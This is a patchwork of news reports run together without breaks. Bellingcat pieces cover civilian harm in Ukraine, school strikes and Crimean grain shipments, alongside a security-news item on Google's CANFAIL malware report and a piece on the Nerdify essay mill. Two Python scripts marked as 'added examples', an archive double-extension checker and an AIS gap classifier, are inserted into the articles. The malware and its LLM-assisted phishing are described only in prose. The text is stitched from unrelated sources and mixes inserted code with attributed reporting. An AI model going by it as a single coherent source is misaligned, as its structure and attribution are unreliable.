Our data – which includes cases that Bellingcat researchers were able to definitively geolocate using open source evidence, and does not reflect the full extent of civilian harm across Ukraine – pinpoints more than 300 attacks on schools or childcare facilities, 170 hits on healthcare or humanitarian sites, and four dozen incidents targeting food and related infrastructure.
While many attacks were clustered around four main cities – Kharkiv, Donetsk, Kherson and Kyiv – we documented strikes across all areas of the country. Of the weapons that could be identified through available open source information, cluster munitions were used in more than 100 cases.
Cluster munitions, which are banned in more than 100 countries (but not Russia or Ukraine), have killed more than 1,200 people since the war began, with Ukraine recording the highest number of annual casualties worldwide from these weapons in 2024 for the third consecutive year, according to the Landmine and Cluster Munition Monitor.
Bellingcat and members of its volunteer community logged all verified incidents of civilian harm on an interactive TimeMap over a four-year period spanning February 2022 to December 2025. The map is no longer being updated, but it remains online as an archive (and can be seen below).
An interactive map detailing incidents of civilian harm between February 2022 and December 2025.
Since Russia’s invasion four years ago, the civilian toll in Ukraine has been stark, with around 15,000 killed – including more than 750 children – and 40,600 injured, according to a January 2026 report by the Office of the United Nations High Commissioner for Human Rights.
An analysis last year by Armed Conflict Location and Event Data (ACLED) found that Russia followed “a persistent pattern of targeting of populated areas … often indiscriminate, other times more deliberate”.
ACLED’s data for the period of February 2022 to late January 2026 highlights thousands of residential strikes across Ukraine, along with more than 750 attacks on healthcare facilities, 1,200 on educational sites, and 2,400 on energy infrastructure. A February 2025 World Bank report says it will take more than US$500bn to rebuild Ukraine.
These numbers tell only part of the story. While much global media attention has focused on the politics of the Russia-Ukraine war, or highlighted strikes on large urban centres, civilians in remote rural villages have suffered outsized impacts from the destruction of schools, hospitals and cultural institutions – the key threads tying their communities together.
In Verkhna Syrovatka, a small village in Sumy of around 3,800 people, images from the scene of shelling in May 2025 revealed a massive hole in the community’s blue-roofed cultural house. Inside the facility, which once served as a place for rehearsals, children’s classes and folk ensembles, photographs and trophies could be seen amid piles of splintered wood and cracked concrete.
The village’s only school was also impacted, with many of its windows blown out, forcing classes to move online. This devastation reflects a countrywide trend, as UNICEF reports that Ukrainian children are falling behind in core subjects such as reading, maths and science.
Incidents of civilian harm recorded by Bellingcat in Verkhna Syrovatka. Readers can click or tap the dots to learn more about each incident.
Further south, the village of Opytne in the Donetsk region is gradually being erased, amid a series of Russian attacks dating back more than a decade to the 2014 occupation of the Crimean Peninsula.
The village has changed hands repeatedly in recent years. In December 2022, drone footage revealed large-scale destruction of its residential area, including a medical office, music school and church. According to media reports, perhaps only half a dozen residents remain out of more than 1,000 who lived in the village a decade ago.
Image left shows the village of Opytne in 2021, before Russia’s full invasion (Credit: Airbus/Google Earth Pro). Image right shows the village of Opytne in 2024 (Credit: Maxar/Google Earth Pro).
A couple of months later, in February 2023 in Dvorichna, a rural settlement in the Kharkiv region, Russian forces launched another double-tap strike: as first responders searched for survivors from an earlier attack on the village council building, several emergency vehicles were hit.
Located just south of the Russian border, Dvorichna has been occupied on and off since 2022. As a result, the village, whose population was roughly 3,500 four years ago, is estimated to house only 80 residents today.
Across Ukraine, the catalogue of horrors is endless. In Pravdyne, a small village in the Kherson region, the prewar population of more than 1,000 people was reported to have dwindled to fewer than 200 by late 2022. Corpses showing signs of torture have been exhumed from garden beds; in one case, residents reportedly buried the bodies of Ukrainian soldiers under slabs of slate to prevent dogs from reaching them.
Incidents of civilian harm recorded by Bellingcat in Pravdyne. Readers can click or tap the dots to learn more about each incident.
In Sumy Oblast, Russian drone and missile attacks have forced residents to flee homes they inhabited for half a century. In the village of Hroza in northeastern Ukraine, one-fifth of the population died in a single attack while attending the funeral of a soldier, according to local officials.
What may never be calculated are the impacts this brutal conflict will have on future generations.
Incidents of civilian harm recorded by Bellingcat in Hroza. Readers can click or tap the dots to learn more about each incident.
Back in Krasnopillia, the local school director, Pryima says residents have tried hard to stay in what she calls “the zone of resilience”, but it has been a struggle.
“It’s very scary to fall asleep, because you don’t know if you’ll wake up in the morning,” she said, noting that residents live in constant fear of the drones that fly overhead, keenly aware that a bomb may drop at any moment.
For Ukrainian children, the effects have been especially dire.
“Those children, before the full-scale invasion, were carefree, cheerful – what children should be,” Pryima said. “Those children are no longer there.”
Bellingcat is a non-profit and the ability to carry out our work is dependent on the kind support of individual donors. If you would like to support our work, you can do so here. You can also subscribe to our Patreon channel here. Subscribe to our Newsletter and follow us on Bluesky here, Instagram here, Reddit here and YouTube here.
A new alleged Russia-linked APT group targeted Ukrainian defense, government, and energy groups, with CANFAIL malware.
Google Threat Intelligence Group identified a previously undocumented threat actor behind attacks on Ukrainian organizations using CANFAIL malware. The group is possibly linked to Russian intelligence services and has targeted defense, military, government, and energy entities at both regional and national levels in Ukraine.
GTIG researchers observed the suspected Russian intelligence-linked actor conducting phishing campaigns to deliver the CANFAIL malware. The actor is also interested in aerospace, drone-linked manufacturers, nuclear research, and humanitarian groups tied to Ukraine. Google reported that the group has also probed Romanian and Moldovan entities.
“GTIG has recently discovered a threat group suspected to be linked to Russian intelligence services which conducts phishing operations to deliver CANFAIL malware primarily against Ukrainian organizations.” reads the report published by Google. “Despite being less sophisticated and resourced than other Russian threat groups, this actor recently began to overcome some technical limitations using LLMs. Through prompting, they conduct reconnaissance, create lures for social engineering, and seek answers to basic technical questions for post-compromise activity and C2 infrastructure setup. “
Though less advanced than other Russian groups, the actor uses LLMs to craft lures, perform reconnaissance, and solve basic technical tasks; the phishing emails themselves appear to have been written with an LLM.
Messages include Google Drive links hosting a RAR archive with CANFAIL malware, often disguised with a double extension like .pdf.js. CANFAIL is obfuscated JavaScript that runs a PowerShell script to download and execute a second-stage payload, typically a memory-only dropper, while showing a fake error popup to the victim.
“Phishing emails sent by the actor contain a lure that based on analysis appears to be LLM-generated, uses formal language and a specific official template, and Google Drive links which host a RAR archive containing CANFAIL malware, often disguised with a .pdf.js double extension.” continues the report. “CANFAIL is obfuscated JavaScript which executes a PowerShell script to download and execute an additional stage, most commonly a memory-only PowerShell dropper. It additionally displays a fake “error” popup to the victim.”
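The .pdf.js disguise works because Explorer hides the known final extension and the victim sees only the document-like one, while the script host runs the file. The triage routine below is an added example, not Google's or the actor's code: given the member names of a downloaded archive, it flags any member whose final extension is a script or executable type and separately marks the double-extension case where a document-looking suffix precedes it. The extension sets, the whitespace stripping and the sample listing are assumptions for the demonstration; the check generalises beyond .pdf.js to any document-then-executable pairing.

```python
from pathlib import PurePosixPath

# Extensions a recipient reads as a harmless document or image (assumed set).
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg", ".png"}
# Extensions Windows hands to a script host or loader on double-click (assumed set).
EXECUTABLE_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".lnk",
                   ".exe", ".scr", ".bat", ".cmd", ".ps1"}


def classify_member(name):
    """Classify one archive member name; None means nothing looks suspicious."""
    # Whitespace inside a suffix ("file.pdf .js") is stripped so padding cannot
    # defeat the comparison; this is an assumption about how names get padded.
    suffixes = [s.strip().lower() for s in PurePosixPath(name).suffixes]
    if not suffixes or suffixes[-1] not in EXECUTABLE_EXTS:
        return None
    if len(suffixes) >= 2 and suffixes[-2] in DOCUMENT_EXTS:
        return "double-extension"   # e.g. request.pdf.js: shown as a PDF, runs as JScript
    return "executable"


def triage_archive(member_names):
    """Return {member name: verdict} for every member worth a second look."""
    verdicts = {}
    for name in member_names:
        verdict = classify_member(name)
        if verdict:
            verdicts[name] = verdict
    return verdicts


# Constructed archive listing for the demonstration; not from the reported campaign.
SAMPLE_MEMBERS = [
    "Official_request.pdf.js",
    "Annex_1.docx",
    "photo.jpg",
    "setup.exe",
    "readme.txt",
]

if __name__ == "__main__":
    for name, verdict in triage_archive(SAMPLE_MEMBERS).items():
        print(f"{verdict:17} {name}")
```

On a mail gateway the same function can run over the listing produced by the archive library in use; on an endpoint, a double-extension verdict is a strong enough signal to hold the archive for analyst review rather than merely log it.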
SentinelLABS and the Digital Security Lab of Ukraine documented related activity in the October 2025 “PhantomCaptcha” campaign, which briefly used ClickFix tactics.
Russian espionage groups continue targeting Ukrainian and Western defense-related organizations using military- and drone-themed lures. Below are some groups observed by Google Threat Intelligence Group:
APT44 (Sandworm/FROZENBARENTS), linked to GRU Unit 74455, has sought to extract data from Signal and Telegram, using tools like WAVESIGN and INFAMOUSCHISEL to steal information from Windows and Android devices.
TEMP.Vermin, tied to LPR-linked actors, deployed malware such as VERMONSTER and SPECTRUM using aerospace and drone-themed domains.
UNC5125 targeted frontline drone units with Google Forms lures and malware like MESSYFORK and GREYBATTLE.
UNC5792 and UNC4221 abused Signal and WhatsApp features with fake group invites and phishing pages to hijack accounts and deploy malware including STALECOOKIE and TINYWHALE.
UNC5976 ran phishing campaigns with malicious RDP files and drone-themed decoys spoofing global defense firms.
UNC6096 used WhatsApp to deliver Windows and Android malware, including GALLGRAB.
UNC5114 spread CraxsRAT disguised as a Kropyva app update.
“Russia’s use of cyber operations in support of military objectives in the war against Ukraine and beyond is multifaceted. On a tactical level, targeting has broadened to include individuals in addition to organizations in order to support frontline operations and beyond, likely due at least in part to the reliance on public and off-the-shelf technology rather than custom products.” concludes the report. “Russian threat actors have targeted secure messaging applications used by the Ukrainian military to communicate and orchestrate military operations, including via attempts to exfiltrate locally stored databases of these apps, such as from mobile devices captured during Russia’s ongoing invasion of Ukraine.”
Russian state has tolerated parallel probiv market for its convenience but now Ukrainian spies are exploiting it
Russia is scrambling to rein in the country’s sprawling illicit market for leaked personal data, a shadowy ecosystem long exploited by investigative journalists, police and criminal groups.
For more than a decade, Russia’s so-called probiv market – a term derived from the verb “to pierce” or “to punch into a search bar” – has operated as a parallel information economy built on a network of corrupt officials, traffic police, bank employees and low-level security staff willing to sell access to restricted government or corporate databases.
Last month, in the dead of a cold autumn night, residents in the Ukrainian town of Balakliia were woken by the sound of two massive explosions.
Social media footage showed apartments ablaze, balconies obliterated and a deep crater smouldering in a parking lot.
Three people were killed and 13 injured in the November 17 attack, Ukraine’s State Emergency Services (SES) said. Four of those injured were children, the SES added. A kindergarten, situated just over a hundred metres from one of the impact sites, was also reported to have suffered damage.
Since the beginning of the full-scale invasion of Ukraine, schools, educational facilities and spaces used by children have repeatedly been damaged in strikes or closed because of them.
According to the United Nations’ agency for children, UNICEF, many schools remain closed or continue to be disrupted by air raid alarms. Almost one million children have also been forced to study online, UNICEF states.
Balakliia lies in Kharkiv Oblast in the north east of Ukraine. Another Russian strike carried out there earlier in November caused damage near the town’s main square. Located just over 100 metres away was a high school and not far from that a local theatre school. While neither of those facilities appeared to be directly damaged, many other educational institutions have not been so lucky.
Educational Facilities in the Firing Line
A Ukrainian government website (saveschools.in.ua) has been tracking the number of kindergartens, high schools, colleges and universities that have been damaged and destroyed across the country.
At time of publication 3,676 educational facilities have been damaged nationwide and 394 destroyed, according to saveschools.in.ua.
These trends are reflected in social media data collected by Bellingcat.
Since the start of Russia’s full-scale invasion, Bellingcat has been gathering and verifying social media footage showing incidents of civilian harm.
More than 2,500 incidents have been identified during this period, including attacks on hospitals, power stations, residential buildings and cultural sites. The full dataset is public and can be found here. But this is likely just a fraction of the damage caused across Ukraine as the data only captures incidents recorded and published on social media channels that have been verified.
Amongst this dataset are more than 200 cases of educational facilities that have been damaged or destroyed.
In September this year, for example, social media footage captured the moment a Russian drone hit an administrative building at Kharkiv’s National University of Pharmacy.
As far back as July 2022, a school for the visually impaired in eastern Kharkiv was hit by Russian rockets, leaving windows smashed and classrooms burned out.
Just a few months before that, footage posted online appeared to show the remains of a missile that hit a school in the town of Merefa, situated around 30 kilometres to the southeast of Kharkiv.
Kharkiv’s Youth Bears Burden
More educational facilities have been damaged or destroyed in Kharkiv Oblast than in any other territory currently held by Ukraine, according to Bellingcat’s dataset and saveschools.in.ua statistics.
In Kharkiv city and its surrounding areas, Bellingcat found and archived footage of at least 26 schools, kindergartens, colleges or universities that have been damaged and destroyed since Russia’s full-scale invasion. A further 36 strikes that impacted areas around educational facilities in Kharkiv but did not directly hit them were also verified and archived by Bellingcat.
Bohdan Levchykov, a 15-year-old teenager, walks by a damaged habitation building in Balakliia, on October 13, 2025. OLEKSII FILIPPOV / AFP
Sustained attacks on educational facilities as well as widespread disruption to studies caused by the war are having a lasting impact on Ukraine’s young people, children’s rights groups say.
A report from Save the Children earlier this year detailed how attacks on educational facilities had doubled in Ukraine over the course of 2024. The same report found that parents were scared to send their children to school and that many children were being forced to resort to online learning at home.
A 2024 report from UNICEF found that Ukrainian children are falling behind children in other countries across multiple subjects, including reading, maths and science.
In Balakliia, journalists from Agence France-Presse (AFP) bureaus in Paris and Kharkiv spoke to teenage student Bohdan Levchykov who said he studies at home and seldom leaves the house. Levchykov also spoke about the impact of losing his father in the early months of the war.
About an hour’s drive to the northwest, in the town of Khorocheve, a psychologist with the non-profit Voices of Children, Maryna Dudbyk, told AFP that the ongoing war means that everyone is living under stress.
“This has a huge impact on children’s emotional state,” she said.
“We diagnose a lot of fear and anxiety among children. Adolescents suffer from self-harm, suicidal thoughts, and the loss of loved ones.”
Beyond Schools
Other facilities, beyond schools, regularly enjoyed by children have also been impacted by the war, compounding the challenges young people face.
Bellingcat’s dataset found 28 incidents where swimming pools, parks, football pitches, bowling alleys or museums had been impacted in and around Kharkiv. A further 16 incidents were recorded in areas surrounding such facilities. The interactive below shows (in red) incidents where educational or recreational facilities used by young people have been impacted by Russian strikes in and around Kharkiv. The other markers in the map (in purple) detail additional civilian harm incidents Bellingcat has been able to verify. A wider dataset showing incidents that have impacted areas surrounding educational and recreational facilities can be found here.
Incidents of civilian harm directly affecting schools and childrens’ leisure facilities are highlighted in red.
One video from March this year showed young men playing football scrambling for cover as a drone can be heard overhead before an explosion can be seen.
Although Ukraine’s policymakers are facing many challenges as Russia’s invasion of Ukraine approaches its fifth year, the mental health of the country’s youth is on their minds.
Oksana Zbitnieva, head of the Interministerial Coordination Center for Mental Health told AFP that “130,000 frontline health professionals—nurses, pediatricians, family doctors—have received certified training as part of a WHO mental health program.”
Meanwhile, more than 300 “resilience centres” welcome children and parents across the country, with three hundred more expected to be built next year, according to Ukrainian Social Affairs Minister Denys Uliutine.
New concepts are also being tested and tried.
Children leave an underground school in Kharkiv, on October 16, 2025. OLEKSII FILIPPOV / AFP
In Kharkiv, underground schools – located beneath the streets of the city – are being set up to help bring children back into the classroom.
City authorities told AFP there would be 10 underground schools operational by the end of 2025.
At a school visited by AFP, a rotating system allows it to continue offering children in-person education, even if only for a limited time, each week. The school enables every child to attend half a day of their class in-person each week. When the child returns home they continue their education via remote classes, while another student comes into school for their half day spot. This allows the school to accommodate 1,400 children, including on weekends.
Yet recent events in Kharkiv highlight that normal life is far from returning, despite recent peace efforts.
At the end of October, a kindergarten in the west of the city was struck by a Russian drone.
Footage from the scene showed panicked parents and disoriented children being carried away by emergency workers as smoke billowed from the kindergarten.
Despite the scale of the destruction visible in social media footage, only one person (an adult male) was reported to have died during this strike.
For many youngsters in Ukraine, there may be no reclaiming the childhood that war has taken from them.
But Bohdan Levchykov in Balakliia believes there are still things to look forward to.
He told AFP about the friends he had made online, including one named Lana who lives more than 400km away in the city of Dnipro, and his hopes of meeting them in real life one day.
“I’ve talked about it with my mother,” he told AFP.
“Maybe our parents can arrange something for us to meet,” he said hopefully.
Eoghan Macguire, Youri van der Weide and Logan Williams contributed to this report for Bellingcat as did Stéphanie Ladel and Olivia Gresham from Bellingcat’s Volunteer Community.
Boris Bachorz reported and conducted interviews for AFP with the help of Natalia Yermak.
A version of this story can be found on the website of the Central European Digital Media Observatory (CEDMO).
A joint investigation by Bellingcat and Lloyd’s List has identified Saudi Arabia as the newest country to import grain directly from a Western-sanctioned port in occupied Crimea, as Russia attempts to secure recognition of the Ukrainian territory via a US-led peace plan.
Satellite imagery and Automated Identification System (AIS) data from Lloyd’s List Intelligence show the bulk carrier Krasnodar (IMO: 9296781) sailed from the Avlita Grain Terminal in Sevastopol to Saudi Arabia on two occasions between September and November 2025. Bellingcat confirmed Krasnodar’s journeys ended at Saudi Arabia’s King Abdullah Port in September and the Port of Jazan in November.
These journeys show that Saudi Arabia has joined buyers in Iran, Syria, Egypt, Turkey, Venezuela and Houthi-controlled territories in Yemen who are willing to accept what the Ukrainian government describes as “stolen” grain.
Krasnodar turns its AIS back on in the Black Sea, as required to transit the Bosphorus on September 6.
Bosphorus Strait
Krasnodar transits the Bosphorus. Judging by the draft, with no visible red paint on its hull, the ship appears to be fully laden.
Credit: Yörük Işık
Saudi Arabia: King Abdullah Port
Imagery (as well as AIS data) shows Krasnodar docked at the King Abdullah Port. A pile of what appears to be grain is visible to the right of the image on September 18.
Returning via the Suez Canal, Krasnodar transits through the Bosphorus on September 28 with its red paint fully visible, indicating it is not heavily laden.
Credit: Yörük Işık
Black Sea
Krasnodar goes dark – an AIS gap lasting more than one week begins on October 6.
Occupied Crimea: Port of Sevastopol
Satellite imagery shows Krasnodar docked, with its hatches open, at Berth 21 of the Avlita grain terminal on October 8.
After leaving Jazan, Krasnodar returned to the Black Sea via the Bosphorus on November 23.
It stopped transmitting AIS for a third time on November 24 for nine days and has been intermittently transmitting data since.
Krasnodar was again captured in satellite imagery docked at the Avlita terminal in Sevastopol on November 26.
Krasnodar captured in satellite imagery docked at the Avlita terminal in Sevastopol on November 26. Credit: Planet Labs PBC
Petrokhleb-Kuban Denies Visiting Avlita Terminal
Documents accessed on Russia’s federal registry indicate the vessel is leased by Russian firm Petrokhleb-Kuban, a major player in Russian and international grain markets.
Petrokhleb Kuban told Bellingcat it “categorically denies any allegations of involvement in the theft of grain from Ukrainian regions”.
It added that Petrokhleb-Kuban does not export grain from the Avlita terminal to any country.
“Petrokhleb-Kuban does not operate at the port of Avlita and does not ship grain from there. All grain shipped by Petrokhleb-Kuban is produced by Russian farmers,” a spokesperson said.
“The vessel Krasnodar follows all widely accepted safety protocols and does not disable its AIS while on passage. The AIS signal in the Black Sea is being jammed by the military due to the ongoing conflict between Russia and Ukraine.”
The spokesperson also said the vessel Krasnodar was loading barley at the port of Kavkaz, “as confirmed by bills of lading and port clearance.”
AIS interference is rampant in the Black Sea; however, instances of jamming typically do not last more than a couple of days. Further, third-party disruptions affect all vessels in an area indiscriminately, not a single ship.
Bellingcat reviewed the AIS traces of vessels sailing near Krasnodar. In both voyages, Krasnodar was the only vessel in that area that stopped transmitting AIS data for that period of time.
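The comparison Bellingcat describes, checking whether a vessel's silence is shared by the ships around it, can be run mechanically over position reports. The script below is an added example with constructed traces; it is not Lloyd's List Intelligence data and not Bellingcat's tooling. For every gap longer than a threshold it asks whether the other vessels in the same area also stopped reporting for the whole window (consistent with regional interference) or kept transmitting (a dark period specific to that vessel). The neighbour names, the one-report-per-day cadence, the two-day threshold and the two-day jamming episode are assumptions; only Krasnodar's nine-day gap from 6 October follows the article.

```python
from datetime import datetime, timedelta


def parse_reports(lines):
    """Parse 'VESSEL,ISO-TIMESTAMP' lines into {vessel: sorted list of datetimes}."""
    by_vessel = {}
    for line in lines:
        vessel, ts = line.strip().split(",")
        by_vessel.setdefault(vessel, []).append(datetime.fromisoformat(ts))
    for times in by_vessel.values():
        times.sort()
    return by_vessel


def gaps(times, min_gap):
    """Consecutive-report pairs separated by at least min_gap."""
    return [(a, b) for a, b in zip(times, times[1:]) if b - a >= min_gap]


def silent_during(times, start, end):
    """True if the vessel sent no report strictly inside (start, end)."""
    return not any(start < t < end for t in times)


def classify_gaps(by_vessel, min_gap=timedelta(days=2)):
    """For every gap of at least min_gap, report whether the other vessels in the
    same area went quiet too (regional interference) or kept reporting
    (a selective dark period for that vessel only)."""
    findings = []
    for vessel, times in by_vessel.items():
        others = [v for v in by_vessel if v != vessel]
        for start, end in gaps(times, min_gap):
            silent = [v for v in others if silent_during(by_vessel[v], start, end)]
            if others and len(silent) == len(others):
                verdict = "regional interference"
            elif not silent:
                verdict = "selective dark period"
            else:
                verdict = "inconclusive"
            findings.append((vessel, start.date(), end.date(), verdict))
    return findings


def daily_reports(vessel, first_day, days, missing=()):
    """Build one report per day from first_day, omitting the day indexes in missing."""
    base = datetime.fromisoformat(first_day)
    return [f"{vessel},{(base + timedelta(days=i)).isoformat()}"
            for i in range(days) if i not in missing]


# Constructed traces: three vessels in the same area, one report a day from
# 2025-10-01 for twenty days. Day indexes 11 and 12 (12-13 October) are missing
# for everyone, an assumed jamming episode. Krasnodar alone is also missing
# indexes 6-13, i.e. it is silent from 6 October until 15 October.
JAMMED = {11, 12}
SAMPLE_LINES = (
    daily_reports("KRASNODAR", "2025-10-01", 20, missing=set(range(6, 14)))
    + daily_reports("NEIGHBOUR_A", "2025-10-01", 20, missing=JAMMED)
    + daily_reports("NEIGHBOUR_B", "2025-10-01", 20, missing=JAMMED)
)

if __name__ == "__main__":
    for vessel, start, end, verdict in classify_gaps(parse_reports(SAMPLE_LINES)):
        print(f"{vessel:12} {start} -> {end}: {verdict}")
```

The "inconclusive" branch matters in practice: with dozens of neighbours some will always have their own coverage holes, so a real run should also record what fraction of them stayed silent and let the analyst set the cut-off rather than treating a partial match as either outcome.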
Bellingcat also checked available Planet Labs PBC and Sentinel-2 satellite imagery covering the grain terminal in Port Kavkaz during the two periods of August and October where Krasnodar has absent or unreliable AIS coverage and found no vessels matching the length of the Krasnodar.
Bellingcat identified Krasnodar at the Avlita terminal on three occasions by cross-referencing satellite images with recent photographs and video of the ship. Krasnodar was last detected at the Avlita terminal in satellite imagery on November 26, again with its AIS switched off. Krasnodar’s chimney is navy blue in colour, except for a white band on its left, right and front sides. The ship’s other features, five grey hatches, four grey cranes, a red deck and a green floor on the bridge, all visually match known images of the ship.
Finally, the ship’s measurements (a total length of 183 metres, according to Russia’s shipping registry) match what we see in the satellite images.
Visual Comparison: Images of Krasnodar at Avlita Terminal and other recent images of Krasnodar
The Krasnodar has a dark blue (midnight navy blue) chimney with a white band that runs around the sides and the front of the chimney, leaving the back completely blue.
A close up of the Krasnodar photographed in the Bosphorus on October 26, 2025. Credit: Yörük Işık.
The life boats are immediately to the left and right of the bridge. The boats can also be seen in satellite imagery from Saudi Arabia. The image below shows Krasnodar in Jazan.
Krasnodar seen in Satellite Image at the Port of Jazan, Saudi Arabia on November 6, 2025. Credit: Planet Labs PBC.
Satellite imagery also clearly shows the colour of deck (dull red), the floor colour of the bridge (green), the colour of the hatches and the cranes (grey). All of that, as well as the chimney (navy blue with white) can be matched with satellite imagery from Sevastopol that show Krasnodar docked at the Avlita grain terminal.
Left: Krasnodar seen in Satellite Image at the Port of Jazan, Saudi Arabia on November 6, 2025. Right: Krasnodar seen in Satellite Image docked at Avlita grain terminal in the Port of Sevastopol on October 8, 2025. Credits: Planet Labs PBC and 2025 Vantor.
Five grey hatches and a red deck. The image on the left is from Jazan (November 6). The image on the right is from Sevastopol (October 8).
A close up of the above images. Credits: Planet Labs PBC and 2025 Vantor.
If we zoom in on the bridge, we can also see that the shape and the colour (grey) of the top of the bridge are also a visual match.
The chimney is not very clearly visible in the image from Jazan but it is clear that the chimney is dark in colour. The image from Sevastopol shows a dark blue chimney with a white band, which was also visible in images and video of Krasnodar.
Left: Krasnodar seen in a satellite image docked at the Avlita grain terminal in the Port of Sevastopol on October 8, 2025. Right: A close up of the Krasnodar taken in the Bosphorus on October 26, 2025. Credits: 2025 Vantor and Yörük Işık. Annotations by Bellingcat.
We see red on the hull, below the water line, in the Sevastopol satellite image. You can also see it in the image from when the ship transited the Bosphorus. The rest of the hull is dark.
Left: Krasnodar seen in a satellite image docked at the Avlita grain terminal in the Port of Sevastopol on October 8, 2025. Right: Krasnodar photographed in the Bosphorus on October 26, 2025. Credits: 2025 Vantor and Yörük Işık.
There are no live or historic sanctions on Krasnodar, according to Lloyd’s List Intelligence data.
Saudi Arabia Joins List of Importers of Russia’s Smuggled Grain
Krasnodar’s voyages from Sevastopol to Saudi Arabia demonstrate that Russia is continuing to expand its grain exports from occupied Crimea to new markets as it negotiates to end the war in Ukraine.
Crimea’s occupied ports have become important assets for Moscow, having evolved into key logistics hubs for dark grain exports over the course of the war.
Prior to the full-scale invasion of Ukraine in 2022, the ports in occupied Crimea were used for the small-scale export of grain and scrap metal, mostly to Syria and Turkey.
The occupation of additional territory in Donetsk and Zaporizhia enabled Russia to establish a new supply route, resulting in more grain being shipped south to Crimea for export to international markets.
The Port of Sevastopol and the Avlita grain terminal remain under European, UK and US sanctions. While no UN sanctions specifically target the port, a majority of UN member states have passed resolutions condemning Russia’s invasion of Ukraine and its occupation of Crimea since 2024.
Ukraine has repeatedly tried to dissuade countries from purchasing shipments loaded with what it describes as “stolen” grain from occupied regions.
In 2023, Iran received its first grain shipments from Sevastopol. In 2024, it was joined by Venezuela, Libya, Egypt and the Houthis, which control territory in Yemen. Last month, Bellingcat revealed that the bulk carrier Irtysh (IMO: 9664976) delivered grain from the Crimean port of Sevastopol to the Houthi-controlled port of Saleef in Yemen despite Western Sanctions.
Bellingcat and other news outlets have identified a total of eight countries that have imported grain directly from occupied Crimea.
While Saudi Arabia is the latest direct importer from Sevastopol, it is unclear if authorities are aware of the origin of the cargo.
The grain shipments follow a similar pattern to Russia’s shadow fleet, which moves sanctioned oil barrels. In both cases steps are taken to disguise the origin of the cargo and port of loading.
Most ships calling to Crimea disable their AIS transponders, which is considered a deceptive shipping practice, and fraudulent documents are issued.
Alona Shkrum, First Deputy Minister for Development of Communities and Territories of Ukraine, told Bellingcat that Ukraine was closely monitoring Russian exports from occupied territories. She said Ukraine had discussed the issue with Saudi Arabia on the sidelines of recent talks at the International Maritime Organisation Assembly.
She told Bellingcat that Ukraine had “received assurances that Saudi authorities are actively counteracting the risks posed by shadow fleet operations and other violations of international maritime law.”
She added that Ukraine would continue to work with partners to identify and sanction vessels involved in the illegal export of grain from occupied territories.
Bellingcat contacted both the Saudi Arabian Ministry of Foreign Affairs and the Russian Ministry of Foreign Affairs; neither responded to requests for comment.
US-Russia Peace Plan and Ownership of Ukraine’s Ports
The US-Russia 28-point peace proposal includes the recognition of Crimea, Luhansk and Donetsk as “de facto” Russian. Ownership of Crimea and the occupied territories bordering the Sea of Azov is critical for securing shipping routes to and from Russia, and these ports play a vital role in supporting economic growth in the region.
However, the impact of ceding control of this region and the port of Sevastopol to Russia is not mentioned in either the original US draft plan or subsequent amended versions.
Ian Ralby, chief executive of the maritime and resource security consultancy I.R. Consilium said while it was a high priority for Ukraine to ensure access to the grain market through the Black Sea is preserved, Russia is continuing to try to expand its global access to ports.
“We see that there is a resurgence in Russia’s efforts on port access.”
“As the prospect of potential peace begins to loom, even though it seems to be much farther off than many would want, there is likely to be a renewed focus on the key strategic assets that matter for the future, and the ports have to be foremost among them.”
Bridget Diakun, Yörük Işık, Youri van der Weide, Peter Barth and Galen Reich contributed to this report.
Cover image: Planet Lab image shows Krasnodar docked at Jazan City, Saudi Arabia on November 6. Credit: Planet Labs PBC.
A sprawling academic cheating network turbocharged by Google Ads that has generated nearly $25 million in revenue has curious ties to a Kremlin-connected oligarch whose Russian university builds drones for Russia’s war against Ukraine.
The Nerdify homepage.
The link between essay mills and Russian attack drones might seem improbable, but understanding it begins with a simple question: How does a human-intensive academic cheating service stay relevant in an era when students can simply ask AI to write their term papers? The answer – recasting the business as an AI company – is just the latest chapter in a story of many rebrands that link the operation to Russia’s largest private university.
Search in Google for any terms related to academic cheating services — e.g., “help with exam online” or “term paper online” — and you’re likely to encounter websites with the words “nerd” or “geek” in them, such as thenerdify[.]com and geekly-hub[.]com. With a simple request sent via text message, you can hire their tutors to help with any assignment.
These nerdy and geeky-branded websites frequently cite their “honor code,” which emphasizes they do not condone academic cheating, will not write your term papers for you, and will only offer support and advice for customers. But according to This Isn’t Fine, a Substack blog about contract cheating and essay mills, the Nerdify brand of websites will happily ignore that mantra.
“We tested the quick SMS for a price quote,” wrote This Isn’t Fine author Joseph Thibault. “The honor code references and platitudes apparently stop at the website. Within three minutes, we confirmed that a full three-page, plagiarism- and AI-free MLA formatted Argumentative essay could be ours for the low price of $141.”
A screenshot from Joseph Thibault’s Substack post shows him purchasing a 3-page paper with the Nerdify service.
Google prohibits ads that “enable dishonest behavior.” Yet, a sprawling global essay and homework cheating network run under the Nerdy brands has quietly bought its way to the top of Google searches – booking revenues of almost $25 million through a maze of companies in Cyprus, Malta and Hong Kong, while pitching “tutoring” that delivers finished work that students can turn in.
When one Nerdy-related Google Ads account got shut down, the group behind the company would form a new entity with a front-person (typically a young Ukrainian woman), start a new ads account along with a new website and domain name (usually with “nerdy” in the brand), and resume running Google ads for the same set of keywords.
UK companies belonging to the group that have been shut down by Google Ads since Jan 2025 include:
Currently active Google Ads accounts for the Nerdify brands include:
- OK Marketing LTD (advertising geekly-hub[.]net), formed in the name of Olha Karpenko, a young Ukrainian woman;
- Two Sigma Solutions LTD (advertising litero[.]ai), formed in the name of Olekszij (Alexey) Pokatilo.
Google’s Ads Transparency page for current Nerdify advertiser OK Marketing LTD.
Mr. Pokatilo has been in the essay-writing business since at least 2009, operating a paper-mill enterprise called Livingston Research alongside Alexander Korsukov, who is listed as an owner. According to a lengthy account from a former employee, Livingston Research mainly farmed its writing tasks out to low-cost workers from Kenya, Philippines, Pakistan, Russia and Ukraine.
Pokatilo moved from Ukraine to the United Kingdom in Sept. 2015 and co-founded a company called Awesome Technologies, which pitched itself as a way for people to outsource tasks by sending a text message to the service’s assistants.
The other co-founder of Awesome Technologies is 36-year-old Filip Perkon, a Swedish man living in London who touts himself as a serial entrepreneur and investor. Years before starting Awesome together, Perkon and Pokatilo co-founded a student group called Russian Business Week while the two were classmates at the London School of Economics. According to the Bulgarian investigative journalist Christo Grozev, Perkon’s birth certificate was issued by the Soviet Embassy in Sweden.
Alexey Pokatilo (left) and Filip Perkon at a Facebook event for startups in San Francisco in mid-2015.
